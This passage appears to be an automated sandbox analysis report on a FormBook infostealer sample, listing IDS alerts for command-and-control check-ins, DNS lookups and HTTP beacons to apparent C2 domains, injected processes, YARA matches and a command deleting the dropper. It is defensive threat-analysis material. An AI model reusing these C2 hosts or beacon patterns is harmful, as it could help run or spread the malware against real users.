192.168.2.534.102.136.18049859802031453 06/06/22-23:33:25.150349	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49859	80	192.168.2.5	34.102.136.180
192.168.2.534.102.136.18049859802031412 06/06/22-23:33:25.150349	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49859	80	192.168.2.5	34.102.136.180
192.168.2.5162.213.255.23749865802031453 06/06/22-23:33:46.702528	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49865	80	192.168.2.5	162.213.255.237
192.168.2.534.102.136.18049859802031449 06/06/22-23:33:25.150349	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49859	80	192.168.2.5	34.102.136.180
192.168.2.5162.213.255.23749865802031412 06/06/22-23:33:46.702528	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49865	80	192.168.2.5	162.213.255.237

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2022 23:33:25.126621962 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.143158913 CEST	80	49859	34.102.136.180	192.168.2.5
Jun 6, 2022 23:33:25.143383026 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.150348902 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.167030096 CEST	80	49859	34.102.136.180	192.168.2.5
Jun 6, 2022 23:33:25.265573025 CEST	80	49859	34.102.136.180	192.168.2.5
Jun 6, 2022 23:33:25.265628099 CEST	80	49859	34.102.136.180	192.168.2.5
Jun 6, 2022 23:33:25.265902042 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.265983105 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.586262941 CEST	49859	80	192.168.2.5	34.102.136.180
Jun 6, 2022 23:33:25.604597092 CEST	80	49859	34.102.136.180	192.168.2.5
Jun 6, 2022 23:33:30.300307989 CEST	49861	80	192.168.2.5	104.21.18.171
Jun 6, 2022 23:33:30.335159063 CEST	80	49861	104.21.18.171	192.168.2.5
Jun 6, 2022 23:33:30.335325003 CEST	49861	80	192.168.2.5	104.21.18.171
Jun 6, 2022 23:33:30.335478067 CEST	49861	80	192.168.2.5	104.21.18.171
Jun 6, 2022 23:33:30.367799044 CEST	80	49861	104.21.18.171	192.168.2.5
Jun 6, 2022 23:33:30.417345047 CEST	80	49861	104.21.18.171	192.168.2.5
Jun 6, 2022 23:33:30.417365074 CEST	80	49861	104.21.18.171	192.168.2.5
Jun 6, 2022 23:33:30.417429924 CEST	80	49861	104.21.18.171	192.168.2.5
Jun 6, 2022 23:33:30.417551994 CEST	49861	80	192.168.2.5	104.21.18.171
Jun 6, 2022 23:33:30.417597055 CEST	49861	80	192.168.2.5	104.21.18.171
Jun 6, 2022 23:33:35.481024027 CEST	49862	80	192.168.2.5	34.117.168.233
Jun 6, 2022 23:33:35.497705936 CEST	80	49862	34.117.168.233	192.168.2.5
Jun 6, 2022 23:33:35.497845888 CEST	49862	80	192.168.2.5	34.117.168.233
Jun 6, 2022 23:33:35.498003006 CEST	49862	80	192.168.2.5	34.117.168.233
Jun 6, 2022 23:33:35.514497042 CEST	80	49862	34.117.168.233	192.168.2.5
Jun 6, 2022 23:33:35.601926088 CEST	80	49862	34.117.168.233	192.168.2.5
Jun 6, 2022 23:33:35.601943970 CEST	80	49862	34.117.168.233	192.168.2.5
Jun 6, 2022 23:33:35.602359056 CEST	49862	80	192.168.2.5	34.117.168.233
Jun 6, 2022 23:33:35.602405071 CEST	49862	80	192.168.2.5	34.117.168.233
Jun 6, 2022 23:33:35.620863914 CEST	80	49862	34.117.168.233	192.168.2.5
Jun 6, 2022 23:33:40.670095921 CEST	49863	80	192.168.2.5	203.170.80.250
Jun 6, 2022 23:33:40.883769989 CEST	80	49863	203.170.80.250	192.168.2.5
Jun 6, 2022 23:33:40.883932114 CEST	49863	80	192.168.2.5	203.170.80.250
Jun 6, 2022 23:33:40.884038925 CEST	49863	80	192.168.2.5	203.170.80.250
Jun 6, 2022 23:33:41.099994898 CEST	80	49863	203.170.80.250	192.168.2.5
Jun 6, 2022 23:33:41.100023985 CEST	80	49863	203.170.80.250	192.168.2.5
Jun 6, 2022 23:33:41.100198984 CEST	49863	80	192.168.2.5	203.170.80.250
Jun 6, 2022 23:33:41.100404978 CEST	49863	80	192.168.2.5	203.170.80.250
Jun 6, 2022 23:33:41.315495968 CEST	80	49863	203.170.80.250	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2022 23:33:25.097003937 CEST	57127	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:25.120043993 CEST	53	57127	8.8.8.8	192.168.2.5
Jun 6, 2022 23:33:30.273322105 CEST	56784	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:30.298358917 CEST	53	56784	8.8.8.8	192.168.2.5
Jun 6, 2022 23:33:35.435944080 CEST	59558	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:35.468976974 CEST	53	59558	8.8.8.8	192.168.2.5
Jun 6, 2022 23:33:40.634903908 CEST	61384	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:40.668893099 CEST	53	61384	8.8.8.8	192.168.2.5
Jun 6, 2022 23:33:46.115030050 CEST	52530	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:46.143282890 CEST	53	52530	8.8.8.8	192.168.2.5
Jun 6, 2022 23:33:53.724883080 CEST	60496	53	192.168.2.5	8.8.8.8
Jun 6, 2022 23:33:53.831108093 CEST	53	60496	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 6, 2022 23:33:25.097003937 CEST	192.168.2.5	8.8.8.8	0xb624	Standard query (0)	www.foldemforever.com	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:30.273322105 CEST	192.168.2.5	8.8.8.8	0x18a6	Standard query (0)	www.fuugiti.xyz	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:35.435944080 CEST	192.168.2.5	8.8.8.8	0x730f	Standard query (0)	www.coraroseromance.net	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:40.634903908 CEST	192.168.2.5	8.8.8.8	0xa550	Standard query (0)	www.loveuco.com	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:46.115030050 CEST	192.168.2.5	8.8.8.8	0x771	Standard query (0)	www.rapiturs.com	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:53.724883080 CEST	192.168.2.5	8.8.8.8	0x7a08	Standard query (0)	www.budurr.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 6, 2022 23:33:25.120043993 CEST	8.8.8.8	192.168.2.5	0xb624	No error (0)	www.foldemforever.com	foldemforever.com		CNAME (Canonical name)	IN (0x0001)
Jun 6, 2022 23:33:25.120043993 CEST	8.8.8.8	192.168.2.5	0xb624	No error (0)	foldemforever.com		34.102.136.180	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:30.298358917 CEST	8.8.8.8	192.168.2.5	0x18a6	No error (0)	www.fuugiti.xyz		104.21.18.171	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:30.298358917 CEST	8.8.8.8	192.168.2.5	0x18a6	No error (0)	www.fuugiti.xyz		172.67.182.198	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:35.468976974 CEST	8.8.8.8	192.168.2.5	0x730f	No error (0)	www.coraroseromance.net	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jun 6, 2022 23:33:35.468976974 CEST	8.8.8.8	192.168.2.5	0x730f	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Jun 6, 2022 23:33:35.468976974 CEST	8.8.8.8	192.168.2.5	0x730f	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:40.668893099 CEST	8.8.8.8	192.168.2.5	0xa550	No error (0)	www.loveuco.com		203.170.80.250	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:46.143282890 CEST	8.8.8.8	192.168.2.5	0x771	No error (0)	www.rapiturs.com		162.213.255.237	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:53.831108093 CEST	8.8.8.8	192.168.2.5	0x7a08	No error (0)	www.budurr.com		173.239.8.164	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:53.831108093 CEST	8.8.8.8	192.168.2.5	0x7a08	No error (0)	www.budurr.com		173.239.5.6	A (IP address)	IN (0x0001)
Jun 6, 2022 23:33:53.831108093 CEST	8.8.8.8	192.168.2.5	0x7a08	No error (0)	www.budurr.com		74.206.228.78	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.foldemforever.com

www.fuugiti.xyz

www.coraroseromance.net

www.loveuco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49859	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 6, 2022 23:33:25.150348902 CEST	10536	OUT	GET /aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx HTTP/1.1 Host: www.foldemforever.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 6, 2022 23:33:25.265573025 CEST	10537	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 06 Jun 2022 21:33:25 GMT Content-Type: text/html Content-Length: 291 ETag: "629e372d-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49861	104.21.18.171	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 6, 2022 23:33:30.335478067 CEST	10544	OUT	GET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1 Host: www.fuugiti.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 6, 2022 23:33:30.417345047 CEST	10545	IN	HTTP/1.1 302 Found Date: Mon, 06 Jun 2022 21:33:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: 404.html vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ckjt3Lc%2F8FjQle6Ewp4ImaVx8%2BHMf%2ByWRbAP%2FsrJXDU89TqeVWK82WCCwlQTlPTQLyMRXiVs7O2mzZRVMHYkBTJZpIP%2BldsPMLNjiaXfXxFfrbXcshnR64CdW6ZPd258LOQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71744448ad7371c9-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Jun 6, 2022 23:33:30.417365074 CEST	10546	IN	Data Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 Data Ascii: 2c2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, H
Jun 6, 2022 23:33:30.417429924 CEST	10546	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49862	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 6, 2022 23:33:35.498003006 CEST	10547	OUT	GET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1 Host: www.coraroseromance.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 6, 2022 23:33:35.601926088 CEST	10548	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jun 2022 21:33:35 GMT Content-Length: 0 location: https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx strict-transport-security: max-age=3600 x-wix-request-id: 1654551215.50730059403198616 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3 X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HMEnKR1XA+4gsPKvpF+JNj,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=,2d58ifebGbosy5xc+FRalmbPO1WMyccEhMkQjjFtfbKaFXZiMnKxsjK5EXCro7ggGLC2TD/UgrnlY2mEQHTqy/gzhVc3+eVxIR0uyRHmayM=,2UNV7KOq4oGjA5+PKsX47Mm9sOge7X4dT7rtPZIDoNRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6z7IyfxLR0DvGF38ZVfcXQ=,xTu8fpDe3EKPsMR1jrheEPebiodG1ecEvso8LOxPZhk=,wjXkXN74v+Dcwxj+Ualvvp/y9QaRAFtUM0vl2NX3XUuRLk+nKd5t5qBKFq4xFAf3CONUzZLbexpS3PEZaUF96g== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google x-wix-google-ccm: 1 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49863	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 6, 2022 23:33:40.884038925 CEST	10549	OUT	GET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1 Host: www.loveuco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Variant.Tedy.130342.18814.exePID: 7000, Parent PID: 3700

General

Target ID:	0
Start time:	23:31:38
Start date:	06/06/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe"
Imagebase:	0x950000
File size:	1932800 bytes
MD5 hash:	9042135A78A25E60669964F0E673D764
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: ByteCodeGenerator.exePID: 7140, Parent PID: 7000

General

Target ID:	3
Start time:	23:31:53
Start date:	06/06/2022
Path:	C:\Windows\SysWOW64\ByteCodeGenerator.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ByteCodeGenerator.exe
Imagebase:	0xda0000
File size:	48128 bytes
MD5 hash:	AFC144CF65A44040369561D0A7B808BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exePID: 684, Parent PID: 7140

General

Target ID:	4
Start time:	23:31:57
Start date:	06/06/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff74fc70000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exePID: 5708, Parent PID: 684

General

Target ID:	12
Start time:	23:32:34
Start date:	06/06/2022
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf50000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 3220, Parent PID: 5708

General

Target ID:	14
Start time:	23:32:41
Start date:	06/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"
Imagebase:	0x7ff78ca80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 6472, Parent PID: 3220

General

Target ID:	15
Start time:	23:32:42
Start date:	06/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high